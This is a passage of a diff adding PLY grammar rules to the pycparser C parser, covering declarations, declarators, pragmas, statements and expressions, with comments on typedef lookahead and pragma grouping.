self._parse_error('Directives not supported yet', + self._token_coord(p, 1)) + + def p_pppragma_directive(self, p): + """ pppragma_directive : PPPRAGMA + | PPPRAGMA PPPRAGMASTR + """ + if len(p) == 3: + p[0] = c_ast.Pragma(p[2], self._token_coord(p, 2)) + else: + p[0] = c_ast.Pragma("", self._token_coord(p, 1)) + + # In function definitions, the declarator can be followed by + # a declaration list, for old "K&R style" function definitios. + def p_function_definition_1(self, p): + """ function_definition : id_declarator declaration_list_opt compound_statement + """ + # no declaration specifiers - 'int' becomes the default type + spec = dict( + qual=[], + alignment=[], + storage=[], + type=[c_ast.IdentifierType(['int'], + coord=self._token_coord(p, 1))], + function=[]) + + p[0] = self._build_function_definition( + spec=spec, + decl=p[1], + param_decls=p[2], + body=p[3]) + + def p_function_definition_2(self, p): + """ function_definition : declaration_specifiers id_declarator declaration_list_opt compound_statement + """ + spec = p[1] + + p[0] = self._build_function_definition( + spec=spec, + decl=p[2], + param_decls=p[3], + body=p[4]) + + # Note, according to C18 A.2.2 6.7.10 static_assert-declaration _Static_assert + # is a declaration, not a statement. We additionally recognise it as a statement + # to fix parsing of _Static_assert inside the functions. + # + def p_statement(self, p): + """ statement : labeled_statement + | expression_statement + | compound_statement + | selection_statement + | iteration_statement + | jump_statement + | pppragma_directive + | static_assert + """ + p[0] = p[1] + + # A pragma is generally considered a decorator rather than an actual + # statement. Still, for the purposes of analyzing an abstract syntax tree of + # C code, pragma's should not be ignored and were previously treated as a + # statement. This presents a problem for constructs that take a statement + # such as labeled_statements, selection_statements, and + # iteration_statements, causing a misleading structure in the AST. For + # example, consider the following C code. + # + # for (int i = 0; i < 3; i++) + # #pragma omp critical + # sum += 1; + # + # This code will compile and execute "sum += 1;" as the body of the for + # loop. Previous implementations of PyCParser would render the AST for this + # block of code as follows: + # + # For: + # DeclList: + # Decl: i, [], [], [] + # TypeDecl: i, [] + # IdentifierType: ['int'] + # Constant: int, 0 + # BinaryOp: < + # ID: i + # Constant: int, 3 + # UnaryOp: p++ + # ID: i + # Pragma: omp critical + # Assignment: += + # ID: sum + # Constant: int, 1 + # + # This AST misleadingly takes the Pragma as the body of the loop and the + # assignment then becomes a sibling of the loop. + # + # To solve edge cases like these, the pragmacomp_or_statement rule groups + # a pragma and its following statement (which would otherwise be orphaned) + # using a compound block, effectively turning the above code into: + # + # for (int i = 0; i < 3; i++) { + # #pragma omp critical + # sum += 1; + # } + def p_pragmacomp_or_statement(self, p): + """ pragmacomp_or_statement : pppragma_directive statement + | statement + """ + if isinstance(p[1], c_ast.Pragma) and len(p) == 3: + p[0] = c_ast.Compound( + block_items=[p[1], p[2]], + coord=self._token_coord(p, 1)) + else: + p[0] = p[1] + + # In C, declarations can come several in a line: + # int x, *px, romulo = 5; + # + # However, for the AST, we will split them to separate Decl + # nodes. + # + # This rule splits its declarations and always returns a list + # of Decl nodes, even if it's one element long. + # + def p_decl_body(self, p): + """ decl_body : declaration_specifiers init_declarator_list_opt + | declaration_specifiers_no_type id_init_declarator_list_opt + """ + spec = p[1] + + # p[2] (init_declarator_list_opt) is either a list or None + # + if p[2] is None: + # By the standard, you must have at least one declarator unless + # declaring a structure tag, a union tag, or the members of an + # enumeration. + # + ty = spec['type'] + s_u_or_e = (c_ast.Struct, c_ast.Union, c_ast.Enum) + if len(ty) == 1 and isinstance(ty[0], s_u_or_e): + decls = [c_ast.Decl( + name=None, + quals=spec['qual'], + align=spec['alignment'], + storage=spec['storage'], + funcspec=spec['function'], + type=ty[0], + init=None, + bitsize=None, + coord=ty[0].coord)] + + # However, this case can also occur on redeclared identifiers in + # an inner scope. The trouble is that the redeclared type's name + # gets grouped into declaration_specifiers; _build_declarations + # compensates for this. + # + else: + decls = self._build_declarations( + spec=spec, + decls=[dict(decl=None, init=None)], + typedef_namespace=True) + + else: + decls = self._build_declarations( + spec=spec, + decls=p[2], + typedef_namespace=True) + + p[0] = decls + + # The declaration has been split to a decl_body sub-rule and + # SEMI, because having them in a single rule created a problem + # for defining typedefs. + # + # If a typedef line was directly followed by a line using the + # type defined with the typedef, the type would not be + # recognized. This is because to reduce the declaration rule, + # the parser's lookahead asked for the token after SEMI, which + # was the type from the next line, and the lexer had no chance + # to see the updated type symbol table. + # + # Splitting solves this problem, because after seeing SEMI, + # the parser reduces decl_body, which actually adds the new + # type into the table to be seen by the lexer before the next + # line is reached. + def p_declaration(self, p): + """ declaration : decl_body SEMI + """ + p[0] = p[1] + + # Since each declaration is a list of declarations, this + # rule will combine all the declarations and return a single + # list + # + def p_declaration_list(self, p): + """ declaration_list : declaration + | declaration_list declaration + """ + p[0] = p[1] if len(p) == 2 else p[1] + p[2] + + # To know when declaration-specifiers end and declarators begin, + # we require declaration-specifiers to have at least one + # type-specifier, and disallow typedef-names after we've seen any + # type-specifier. These are both required by the spec. + # + def p_declaration_specifiers_no_type_1(self, p): + """ declaration_specifiers_no_type : type_qualifier declaration_specifiers_no_type_opt + """ + p[0] = self._add_declaration_specifier(p[2], p[1], 'qual') + + def p_declaration_specifiers_no_type_2(self, p): + """ declaration_specifiers_no_type : storage_class_specifier declaration_specifiers_no_type_opt + """ + p[0] = self._add_declaration_specifier(p[2], p[1], 'storage') + + def p_declaration_specifiers_no_type_3(self, p): + """ declaration_specifiers_no_type : function_specifier declaration_specifiers_no_type_opt + """ + p[0] = self._add_declaration_specifier(p[2], p[1], 'function') + + # Without this, `typedef _Atomic(T) U` will parse incorrectly because the + # _Atomic qualifier will match, instead of the specifier. + def p_declaration_specifiers_no_type_4(self, p): + """ declaration_specifiers_no_type : atomic_specifier declaration_specifiers_no_type_opt + """ + p[0] = self._add_declaration_specifier(p[2], p[1], 'type') + + def p_declaration_specifiers_no_type_5(self, p): + """ declaration_specifiers_no_type : alignment_specifier declaration_specifiers_no_type_opt + """ + p[0] = self._add_declaration_specifier(p[2], p[1], 'alignment') + + def p_declaration_specifiers_1(self, p): + """ declaration_specifiers : declaration_specifiers type_qualifier + """ + p[0] = self._add_declaration_specifier(p[1], p[2], 'qual', append=True) + + def p_declaration_specifiers_2(self, p): + """ declaration_specifiers : declaration_specifiers storage_class_specifier + """ + p[0] = self._add_declaration_specifier(p[1], p[2], 'storage', append=True) + + def p_declaration_specifiers_3(self, p): + """ declaration_specifiers : declaration_specifiers function_specifier + """ + p[0] = self._add_declaration_specifier(p[1], p[2], 'function', append=True) + + def p_declaration_specifiers_4(self, p): + """ declaration_specifiers : declaration_specifiers type_specifier_no_typeid + """ + p[0] = self._add_declaration_specifier(p[1], p[2], 'type', append=True) + + def p_declaration_specifiers_5(self, p): + """ declaration_specifiers : type_specifier + """ + p[0] = self._add_declaration_specifier(None, p[1], 'type') + + def p_declaration_specifiers_6(self, p): + """ declaration_specifiers : declaration_specifiers_no_type type_specifier + """ + p[0] = self._add_declaration_specifier(p[1], p[2], 'type', append=True) + + def p_declaration_specifiers_7(self, p): + """ declaration_specifiers : declaration_specifiers alignment_specifier + """ + p[0] = self._add_declaration_specifier(p[1], p[2], 'alignment', append=True) + + def p_storage_class_specifier(self, p): + """ storage_class_specifier : AUTO + | REGISTER + | STATIC + | EXTERN + | TYPEDEF + | _THREAD_LOCAL + """ + p[0] = p[1] + + def p_function_specifier(self, p): + """ function_specifier : INLINE + | _NORETURN + """ + p[0] = p[1] + + def p_type_specifier_no_typeid(self, p): + """ type_specifier_no_typeid : VOID + | _BOOL + | CHAR + | SHORT + | INT + | LONG + | FLOAT + | DOUBLE + | _COMPLEX + | SIGNED + | UNSIGNED + | __INT128 + """ + p[0] = c_ast.IdentifierType([p[1]], coord=self._token_coord(p, 1)) + + def p_type_specifier(self, p): + """ type_specifier : typedef_name + | enum_specifier + | struct_or_union_specifier + | type_specifier_no_typeid + | atomic_specifier + """ + p[0] = p[1] + + # See section 6.7.2.4 of the C11 standard. + def p_atomic_specifier(self, p): + """ atomic_specifier : _ATOMIC LPAREN type_name RPAREN + """ + typ = p[3] + typ.quals.append('_Atomic') + p[0] = typ + + def p_type_qualifier(self, p): + """ type_qualifier : CONST + | RESTRICT + | VOLATILE + | _ATOMIC + """ + p[0] = p[1] + + def p_init_declarator_list(self, p): + """ init_declarator_list : init_declarator + | init_declarator_list COMMA init_declarator + """ + p[0] = p[1] + [p[3]] if len(p) == 4 else [p[1]] + + # Returns a {decl= : init=} dictionary + # If there's no initializer, uses None + # + def p_init_declarator(self, p): + """ init_declarator : declarator + | declarator EQUALS initializer + """ + p[0] = dict(decl=p[1], init=(p[3] if len(p) > 2 else None)) + + def p_id_init_declarator_list(self, p): + """ id_init_declarator_list : id_init_declarator + | id_init_declarator_list COMMA init_declarator + """ + p[0] = p[1] + [p[3]] if len(p) == 4 else [p[1]] + + def p_id_init_declarator(self, p): + """ id_init_declarator : id_declarator + | id_declarator EQUALS initializer + """ + p[0] = dict(decl=p[1], init=(p[3] if len(p) > 2 else None)) + + # Require at least one type specifier in a specifier-qualifier-list + # + def p_specifier_qualifier_list_1(self, p): + """ specifier_qualifier_list : specifier_qualifier_list type_specifier_no_typeid + """ + p[0] = self._add_declaration_specifier(p[1], p[2], 'type', append=True) + + def p_specifier_qualifier_list_2(self, p): + """ specifier_qualifier_list : specifier_qualifier_list type_qualifier + """ + p[0] = self._add_declaration_specifier(p[1], p[2], 'qual', append=True) + + def p_specifier_qualifier_list_3(self, p): + """ specifier_qualifier_list : type_specifier + """ + p[0] = self._add_declaration_specifier(None, p[1], 'type') + + def p_specifier_qualifier_list_4(self, p): + """ specifier_qualifier_list : type_qualifier_list type_specifier + """ + p[0] = dict(qual=p[1], alignment=[], storage=[], type=[p[2]], function=[]) + + def p_specifier_qualifier_list_5(self, p): + """ specifier_qualifier_list : alignment_specifier + """ + p[0] = dict(qual=[], alignment=[p[1]], storage=[], type=[], function=[]) + + def p_specifier_qualifier_list_6(self, p): + """ specifier_qualifier_list : specifier_qualifier_list alignment_specifier + """ + p[0] = self._add_declaration_specifier(p[1], p[2], 'alignment') + + # TYPEID is allowed here (and in other struct/enum related tag names), because + # struct/enum tags reside in their own namespace and can be named the same as types + # + def p_struct_or_union_specifier_1(self, p): + """ struct_or_union_specifier : struct_or_union ID + | struct_or_union TYPEID + """ + klass = self._select_struct_union_class(p[1]) + # None means no list of members + p[0] = klass( + name=p[2], + decls=None, + coord=self._token_coord(p, 2)) + + def p_struct_or_union_specifier_2(self, p): + """ struct_or_union_specifier : struct_or_union brace_open struct_declaration_list brace_close + | struct_or_union brace_open brace_close + """ + klass = self._select_struct_union_class(p[1]) + if len(p) == 4: + # Empty sequence means an empty list of members + p[0] = klass( + name=None, + decls=[], + coord=self._token_coord(p, 2)) + else: + p[0] = klass( + name=None, + decls=p[3], + coord=self._token_coord(p, 2)) + + + def p_struct_or_union_specifier_3(self, p): + """ struct_or_union_specifier : struct_or_union ID brace_open struct_declaration_list brace_close + | struct_or_union ID brace_open brace_close + | struct_or_union TYPEID brace_open struct_declaration_list brace_close + | struct_or_union TYPEID brace_open brace_close + """ + klass = self._select_struct_union_class(p[1]) + if len(p) == 5: + # Empty sequence means an empty list of members + p[0] = klass( + name=p[2], + decls=[], + coord=self._token_coord(p, 2)) + else: + p[0] = klass( + name=p[2], + decls=p[4], + coord=self._token_coord(p, 2)) + + def p_struct_or_union(self, p): + """ struct_or_union : STRUCT + | UNION + """ + p[0] = p[1] + + # Combine all declarations into a single list + # + def p_struct_declaration_list(self, p): + """ struct_declaration_list : struct_declaration + | struct_declaration_list struct_declaration + """ + if len(p) == 2: + p[0] = p[1] or [] + else: + p[0] = p[1] + (p[2] or []) + + def p_struct_declaration_1(self, p): + """ struct_declaration : specifier_qualifier_list struct_declarator_list_opt SEMI + """ + spec = p[1] + assert 'typedef' not in spec['storage'] + + if p[2] is not None: + decls = self._build_declarations( + spec=spec, + decls=p[2]) + + elif len(spec['type']) == 1: + # Anonymous struct/union, gcc extension, C1x feature. + # Although the standard only allows structs/unions here, I see no + # reason to disallow other types since some compilers have typedefs + # here, and pycparser isn't about rejecting all invalid code. + # + node = spec['type'][0] + if isinstance(node, c_ast.Node): + decl_type = node + else: + decl_type = c_ast.IdentifierType(node) + + decls = self._build_declarations( + spec=spec, + decls=[dict(decl=decl_type)]) + + else: + # Structure/union members can have the same names as typedefs. + # The trouble is that the member's name gets grouped into + # specifier_qualifier_list; _build_declarations compensates. + # + decls = self._build_declarations( + spec=spec, + decls=[dict(decl=None, init=None)]) + + p[0] = decls + + def p_struct_declaration_2(self, p): + """ struct_declaration : SEMI + """ + p[0] = None + + def p_struct_declaration_3(self, p): + """ struct_declaration : pppragma_directive + """ + p[0] = [p[1]] + + def p_struct_declarator_list(self, p): + """ struct_declarator_list : struct_declarator + | struct_declarator_list COMMA struct_declarator + """ + p[0] = p[1] + [p[3]] if len(p) == 4 else [p[1]] + + # struct_declarator passes up a dict with the keys: decl (for + # the underlying declarator) and bitsize (for the bitsize) + # + def p_struct_declarator_1(self, p): + """ struct_declarator : declarator + """ + p[0] = {'decl': p[1], 'bitsize': None} + + def p_struct_declarator_2(self, p): + """ struct_declarator : declarator COLON constant_expression + | COLON constant_expression + """ + if len(p) > 3: + p[0] = {'decl': p[1], 'bitsize': p[3]} + else: + p[0] = {'decl': c_ast.TypeDecl(None, None, None, None), 'bitsize': p[2]} + + def p_enum_specifier_1(self, p): + """ enum_specifier : ENUM ID + | ENUM TYPEID + """ + p[0] = c_ast.Enum(p[2], None, self._token_coord(p, 1)) + + def p_enum_specifier_2(self, p): + """ enum_specifier : ENUM brace_open enumerator_list brace_close + """ + p[0] = c_ast.Enum(None, p[3], self._token_coord(p, 1)) + + def p_enum_specifier_3(self, p): + """ enum_specifier : ENUM ID brace_open enumerator_list brace_close + | ENUM TYPEID brace_open enumerator_list brace_close + """ + p[0] = c_ast.Enum(p[2], p[4], self._token_coord(p, 1)) + + def p_enumerator_list(self, p): + """ enumerator_list : enumerator + | enumerator_list COMMA + | enumerator_list COMMA enumerator + """ + if len(p) == 2: + p[0] = c_ast.EnumeratorList([p[1]], p[1].coord) + elif len(p) == 3: + p[0] = p[1] + else: + p[1].enumerators.append(p[3]) + p[0] = p[1] + + def p_alignment_specifier(self, p): + """ alignment_specifier : _ALIGNAS LPAREN type_name RPAREN + | _ALIGNAS LPAREN constant_expression RPAREN + """ + p[0] = c_ast.Alignas(p[3], self._token_coord(p, 1)) + + def p_enumerator(self, p): + """ enumerator : ID + | ID EQUALS constant_expression + """ + if len(p) == 2: + enumerator = c_ast.Enumerator( + p[1], None, + self._token_coord(p, 1)) + else: + enumerator = c_ast.Enumerator( + p[1], p[3], + self._token_coord(p, 1)) + self._add_identifier(enumerator.name, enumerator.coord) + + p[0] = enumerator + + def p_declarator(self, p): + """ declarator : id_declarator + | typeid_declarator + """ + p[0] = p[1] + + @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID')) + def p_xxx_declarator_1(self, p): + """ xxx_declarator : direct_xxx_declarator + """ + p[0] = p[1] + + @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID')) + def p_xxx_declarator_2(self, p): + """ xxx_declarator : pointer direct_xxx_declarator + """ + p[0] = self._type_modify_decl(p[2], p[1]) + + @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID')) + def p_direct_xxx_declarator_1(self, p): + """ direct_xxx_declarator : yyy + """ + p[0] = c_ast.TypeDecl( + declname=p[1], + type=None, + quals=None, + align=None, + coord=self._token_coord(p, 1)) + + @parameterized(('id', 'ID'), ('typeid', 'TYPEID')) + def p_direct_xxx_declarator_2(self, p): + """ direct_xxx_declarator : LPAREN xxx_declarator RPAREN + """ + p[0] = p[2] + + @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID')) + def p_direct_xxx_declarator_3(self, p): + """ direct_xxx_declarator : direct_xxx_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET + """ + quals = (p[3] if len(p) > 5 else []) or [] + # Accept dimension qualifiers + # Per C99 6.7.5.3 p7 + arr = c_ast.ArrayDecl( + type=None, + dim=p[4] if len(p) > 5 else p[3], + dim_quals=quals, + coord=p[1].coord) + + p[0] = self._type_modify_decl(decl=p[1], modifier=arr) + + @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID')) + def p_direct_xxx_declarator_4(self, p): + """ direct_xxx_declarator : direct_xxx_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET + | direct_xxx_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET + """ + # Using slice notation for PLY objects doesn't work in Python 3 for the + # version of PLY embedded with pycparser; see PLY Google Code issue 30. + # Work around that here by listing the two elements separately. + listed_quals = [item if isinstance(item, list) else [item] + for item in [p[3],p[4]]] + dim_quals = [qual for sublist in listed_quals for qual in sublist + if qual is not None] + arr = c_ast.ArrayDecl( + type=None, + dim=p[5], + dim_quals=dim_quals, + coord=p[1].coord) + + p[0] = self._type_modify_decl(decl=p[1], modifier=arr) + + # Special for VLAs + # + @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID')) + def p_direct_xxx_declarator_5(self, p): + """ direct_xxx_declarator : direct_xxx_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET + """ + arr = c_ast.ArrayDecl( + type=None, + dim=c_ast.ID(p[4], self._token_coord(p, 4)), + dim_quals=p[3] if p[3] is not None else [], + coord=p[1].coord) + + p[0] = self._type_modify_decl(decl=p[1], modifier=arr) + + @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID')) + def p_direct_xxx_declarator_6(self, p): + """ direct_xxx_declarator : direct_xxx_declarator LPAREN parameter_type_list RPAREN + | direct_xxx_declarator LPAREN identifier_list_opt RPAREN + """ + func = c_ast.FuncDecl( + args=p[3], + type=None, + coord=p[1].coord) + + # To see why _get_yacc_lookahead_token is needed, consider: + # typedef char TT; + # void foo(int TT) { TT = 10; } + # Outside the function, TT is a typedef, but inside (starting and + # ending with the braces) it's a parameter. The trouble begins with + # yacc's lookahead token. We don't know if we're declaring or + # defining a function until we see LBRACE, but if we wait for yacc to + # trigger a rule on that token, then TT will have already been read + # and incorrectly interpreted as TYPEID. We need to add the + # parameters to the scope the moment the lexer sees LBRACE. + # + if self._get_yacc_lookahead_token().type == "LBRACE": + if func.args is not None: + for param in func.args.params: + if isinstance(param, c_ast.EllipsisParam): break + self._add_identifier(param.name, param.coord) + + p[0] = self._type_modify_decl(decl=p[1], modifier=func) + + def p_pointer(self, p): + """ pointer : TIMES type_qualifier_list_opt + | TIMES type_qualifier_list_opt pointer + """ + coord = self._token_coord(p, 1) + # Pointer decls nest from inside out. This is important when different + # levels have different qualifiers. For example: + # + # char * const * p; + # + # Means "pointer to const pointer to char" + # + # While: + # + # char ** const p; + # + # Means "const pointer to pointer to char" + # + # So when we construct PtrDecl nestings, the leftmost pointer goes in + # as the most nested type. + nested_type = c_ast.PtrDecl(quals=p[2] or [], type=None, coord=coord) + if len(p) > 3: + tail_type = p[3] + while tail_type.type is not None: + tail_type = tail_type.type + tail_type.type = nested_type + p[0] = p[3] + else: + p[0] = nested_type + + def p_type_qualifier_list(self, p): + """ type_qualifier_list : type_qualifier + | type_qualifier_list type_qualifier + """ + p[0] = [p[1]] if len(p) == 2 else p[1] + [p[2]] + + def p_parameter_type_list(self, p): + """ parameter_type_list : parameter_list + | parameter_list COMMA ELLIPSIS + """ + if len(p) > 2: + p[1].params.append(c_ast.EllipsisParam(self._token_coord(p, 3))) + + p[0] = p[1] + + def p_parameter_list(self, p): + """ parameter_list : parameter_declaration + | parameter_list COMMA parameter_declaration + """ + if len(p) == 2: # single parameter + p[0] = c_ast.ParamList([p[1]], p[1].coord) + else: + p[1].params.append(p[3]) + p[0] = p[1] + + # From ISO/IEC 9899:TC2, 6.7.5.3.11: + # "If, in a parameter declaration, an identifier can be treated either + # as a typedef name or as a parameter name, it shall be taken as a + # typedef name." + # + # Inside a parameter declaration, once we've reduced declaration specifiers, + # if we shift in an LPAREN and see a TYPEID, it could be either an abstract + # declarator or a declarator nested inside parens. This rule tells us to + # always treat it as an abstract declarator. Therefore, we only accept + # `id_declarator`s and `typeid_noparen_declarator`s. + def p_parameter_declaration_1(self, p): + """ parameter_declaration : declaration_specifiers id_declarator + | declaration_specifiers typeid_noparen_declarator + """ + spec = p[1] + if not spec['type']: + spec['type'] = [c_ast.IdentifierType(['int'], + coord=self._token_coord(p, 1))] + p[0] = self._build_declarations( + spec=spec, + decls=[dict(decl=p[2])])[0] + + def p_parameter_declaration_2(self, p): + """ parameter_declaration : declaration_specifiers abstract_declarator_opt + """ + spec = p[1] + if not spec['type']: + spec['type'] = [c_ast.IdentifierType(['int'], + coord=self._token_coord(p, 1))] + + # Parameters can have the same names as typedefs. The trouble is that + # the parameter's name gets grouped into declaration_specifiers, making + # it look like an old-style declaration; compensate. + # + if len(spec['type']) > 1 and len(spec['type'][-1].names) == 1 and \ + self._is_type_in_scope(spec['type'][-1].names[0]): + decl = self._build_declarations( + spec=spec, + decls=[dict(decl=p[2], init=None)])[0] + + # This truly is an old-style parameter declaration + # + else: + decl = c_ast.Typename( + name='', + quals=spec['qual'], + align=None, + type=p[2] or c_ast.TypeDecl(None, None, None, None), + coord=self._token_coord(p, 2)) + typename = spec['type'] + decl = self._fix_decl_name_type(decl, typename) + + p[0] = decl + + def p_identifier_list(self, p): + """ identifier_list : identifier + | identifier_list COMMA identifier + """ + if len(p) == 2: # single parameter + p[0] = c_ast.ParamList([p[1]], p[1].coord) + else: + p[1].params.append(p[3]) + p[0] = p[1] + + def p_initializer_1(self, p): + """ initializer : assignment_expression + """ + p[0] = p[1] + + def p_initializer_2(self, p): + """ initializer : brace_open initializer_list_opt brace_close + | brace_open initializer_list COMMA brace_close + """ + if p[2] is None: + p[0] = c_ast.InitList([], self._token_coord(p, 1)) + else: + p[0] = p[2] + + def p_initializer_list(self, p): + """ initializer_list : designation_opt initializer + | initializer_list COMMA designation_opt initializer + """ + if len(p) == 3: # single initializer + init = p[2] if p[1] is None else c_ast.NamedInitializer(p[1], p[2]) + p[0] = c_ast.InitList([init], p[2].coord) + else: + init = p[4] if p[3] is None else c_ast.NamedInitializer(p[3], p[4]) + p[1].exprs.append(init) + p[0] = p[1] + + def p_designation(self, p): + """ designation : designator_list EQUALS + """ + p[0] = p[1] + + # Designators are represented as a list of nodes, in the order in which + # they're written in the code. + # + def p_designator_list(self, p): + """ designator_list : designator + | designator_list designator + """ + p[0] = [p[1]] if len(p) == 2 else p[1] + [p[2]] + + def p_designator(self, p): + """ designator : LBRACKET constant_expression RBRACKET + | PERIOD identifier + """ + p[0] = p[2] + + def p_type_name(self, p): + """ type_name : specifier_qualifier_list abstract_declarator_opt + """ + typename = c_ast.Typename( + name='', + quals=p[1]['qual'][:], + align=None, + type=p[2] or c_ast.TypeDecl(None, None, None, None), + coord=self._token_coord(p, 2)) + + p[0] = self._fix_decl_name_type(typename, p[1]['type']) + + def p_abstract_declarator_1(self, p): + """ abstract_declarator : pointer + """ + dummytype = c_ast.TypeDecl(None, None, None, None) + p[0] = self._type_modify_decl( + decl=dummytype, + modifier=p[1]) + + def p_abstract_declarator_2(self, p): + """ abstract_declarator : pointer direct_abstract_declarator + """ + p[0] = self._type_modify_decl(p[2], p[1]) + + def p_abstract_declarator_3(self, p): + """ abstract_declarator : direct_abstract_declarator + """ + p[0] = p[1] + + # Creating and using direct_abstract_declarator_opt here + # instead of listing both direct_abstract_declarator and the + # lack of it in the beginning of _1 and _2 caused two + # shift/reduce errors. + # + def p_direct_abstract_declarator_1(self, p): + """ direct_abstract_declarator : LPAREN abstract_declarator RPAREN """ + p[0] = p[2] + + def p_direct_abstract_declarator_2(self, p): + """ direct_abstract_declarator : direct_abstract_declarator LBRACKET assignment_expression_opt RBRACKET + """ + arr = c_ast.ArrayDecl( + type=None, + dim=p[3], + dim_quals=[], + coord=p[1].coord) + + p[0] = self._type_modify_decl(decl=p[1], modifier=arr) + + def p_direct_abstract_declarator_3(self, p): + """ direct_abstract_declarator : LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET + """ + quals = (p[2] if len(p) > 4 else []) or [] + p[0] = c_ast.ArrayDecl( + type=c_ast.TypeDecl(None, None, None, None), + dim=p[3] if len(p) > 4 else p[2], + dim_quals=quals, + coord=self._token_coord(p, 1)) + + def p_direct_abstract_declarator_4(self, p): + """ direct_abstract_declarator : direct_abstract_declarator LBRACKET TIMES RBRACKET + """ + arr = c_ast.ArrayDecl( + type=None, + dim=c_ast.ID(p[3], self._token_coord(p, 3)), + dim_quals=[], + coord=p[1].coord) + + p[0] = self._type_modify_decl(decl=p[1], modifier=arr) + + def p_direct_abstract_declarator_5(self, p): + """ direct_abstract_declarator : LBRACKET TIMES RBRACKET + """ + p[0] = c_ast.ArrayDecl( + type=c_ast.TypeDecl(None, None, None, None), + dim=c_ast.ID(p[3], self._token_coord(p, 3)), + dim_quals=[], + coord=self._token_coord(p, 1)) + + def p_direct_abstract_declarator_6(self, p): + """ direct_abstract_declarator : direct_abstract_declarator LPAREN parameter_type_list_opt RPAREN + """ + func = c_ast.FuncDecl( + args=p[3], + type=None, + coord=p[1].coord) + + p[0] = self._type_modify_decl(decl=p[1], modifier=func) + + def p_direct_abstract_declarator_7(self, p): + """ direct_abstract_declarator : LPAREN parameter_type_list_opt RPAREN + """ + p[0] = c_ast.FuncDecl( + args=p[2], + type=c_ast.TypeDecl(None, None, None, None), + coord=self._token_coord(p, 1)) + + # declaration is a list, statement isn't. To make it consistent, block_item + # will always be a list + # + def p_block_item(self, p): + """ block_item : declaration + | statement + """ + p[0] = p[1] if isinstance(p[1], list) else [p[1]] + + # Since we made block_item a list, this just combines lists + # + def p_block_item_list(self, p): + """ block_item_list : block_item + | block_item_list block_item + """ + # Empty block items (plain ';') produce [None], so ignore them + p[0] = p[1] if (len(p) == 2 or p[2] == [None]) else p[1] + p[2] + + def p_compound_statement_1(self, p): + """ compound_statement : brace_open block_item_list_opt brace_close """ + p[0] = c_ast.Compound( + block_items=p[2], + coord=self._token_coord(p, 1)) + + def p_labeled_statement_1(self, p): + """ labeled_statement : ID COLON pragmacomp_or_statement """ + p[0] = c_ast.Label(p[1], p[3], self._token_coord(p, 1)) + + def p_labeled_statement_2(self, p): + """ labeled_statement : CASE constant_expression COLON pragmacomp_or_statement """ + p[0] = c_ast.Case(p[2], [p[4]], self._token_coord(p, 1)) + + def p_labeled_statement_3(self, p): + """ labeled_statement : DEFAULT COLON pragmacomp_or_statement """ + p[0] = c_ast.Default([p[3]], self._token_coord(p, 1)) + + def p_selection_statement_1(self, p): + """ selection_statement : IF LPAREN expression RPAREN pragmacomp_or_statement """ + p[0] = c_ast.If(p[3], p[5], None, self._token_coord(p, 1)) + + def p_selection_statement_2(self, p): + """ selection_statement : IF LPAREN expression RPAREN statement ELSE pragmacomp_or_statement """ + p[0] = c_ast.If(p[3], p[5], p[7], self._token_coord(p, 1)) + + def p_selection_statement_3(self, p): + """ selection_statement : SWITCH LPAREN expression RPAREN pragmacomp_or_statement """ + p[0] = fix_switch_cases( + c_ast.Switch(p[3], p[5], self._token_coord(p, 1))) + + def p_iteration_statement_1(self, p): + """ iteration_statement : WHILE LPAREN expression RPAREN pragmacomp_or_statement """ + p[0] = c_ast.While(p[3], p[5], self._token_coord(p, 1)) + + def p_iteration_statement_2(self, p): + """ iteration_statement : DO pragmacomp_or_statement WHILE LPAREN expression RPAREN SEMI """ + p[0] = c_ast.DoWhile(p[5], p[2], self._token_coord(p, 1)) + + def p_iteration_statement_3(self, p): + """ iteration_statement : FOR LPAREN expression_opt SEMI expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement """ + p[0] = c_ast.For(p[3], p[5], p[7], p[9], self._token_coord(p, 1)) + + def p_iteration_statement_4(self, p): + """ iteration_statement : FOR LPAREN declaration expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement """ + p[0] = c_ast.For(c_ast.DeclList(p[3], self._token_coord(p, 1)), + p[4], p[6], p[8], self._token_coord(p, 1)) + + def p_jump_statement_1(self, p): + """ jump_statement : GOTO ID SEMI """ + p[0] = c_ast.Goto(p[2], self._token_coord(p, 1)) + + def p_jump_statement_2(self, p): + """ jump_statement : BREAK SEMI """ + p[0] = c_ast.Break(self._token_coord(p, 1)) + + def p_jump_statement_3(self, p): + """ jump_statement : CONTINUE SEMI """ + p[0] = c_ast.Continue(self._token_coord(p, 1)) + + def p_jump_statement_4(self, p): + """ jump_statement : RETURN expression SEMI + | RETURN SEMI + """ + p[0] = c_ast.Return(p[2] if len(p) == 4 else None, self._token_coord(p, 1)) + + def p_expression_statement(self, p): + """ expression_statement : expression_opt SEMI """ + if p[1] is None: + p[0] = c_ast.EmptyStatement(self._token_coord(p, 2)) + else: + p[0] = p[1] + + def p_expression(self, p): + """ expression : assignment_expression + | expression COMMA assignment_expression + """ + if len(p) == 2: + p[0] = p[1] + else: + if not isinstance(p[1], c_ast.ExprList): + p[1] = c_ast.ExprList([p[1]], p[1].coord) + + p[1].exprs.append(p[3]) + p[0] = p[1] + + def p_parenthesized_compound_expression(self, p): + """ assignment_expression : LPAREN compound_statement RPAREN """ + p[0] = p[2] + + def p_typedef_name(self, p): + """ typedef_name : TYPEID """ + p[0] = c_ast.IdentifierType([p[1]], coord=self._token_coord(p, 1)) + + def p_assignment_expression(self, p): + """ assignment_expression : conditional_expression + | unary_expression assignment_operator assignment_expression + """ + if len(p) == 2: + p[0] = p[1] + else: + p[0] = c_ast.Assignment(p[2], p[1], p[3], p[1].coord) + + # K&R2 defines these as many separate rules, to encode + # precedence and associativity. Why work hard ? I'll just use + # the built in 